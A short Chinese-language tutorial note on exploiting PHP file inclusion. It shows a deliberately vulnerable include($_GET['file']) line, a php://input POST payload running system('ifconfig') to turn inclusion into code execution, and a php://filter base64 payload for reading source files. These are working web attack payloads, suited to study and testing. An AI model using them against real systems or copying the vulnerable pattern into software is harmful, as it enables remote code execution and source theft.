php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。
php://input是用来接收post数据的。可使用火狐的hackbar或brupsuite提交post值。
<?php @include($_GET["file"])?>
只要代码中存在上述文件包含漏洞代码,我们就可以使用php://input,在hackbar里的post data提交<?php system('ifconfig');?>
将文件包含漏洞变成代码执行漏洞。
因此我们可以使用php://input查看文件名,利用php://filter读取文件源码。
php://filter/read=convert.base64-encode/resource=[文件路径]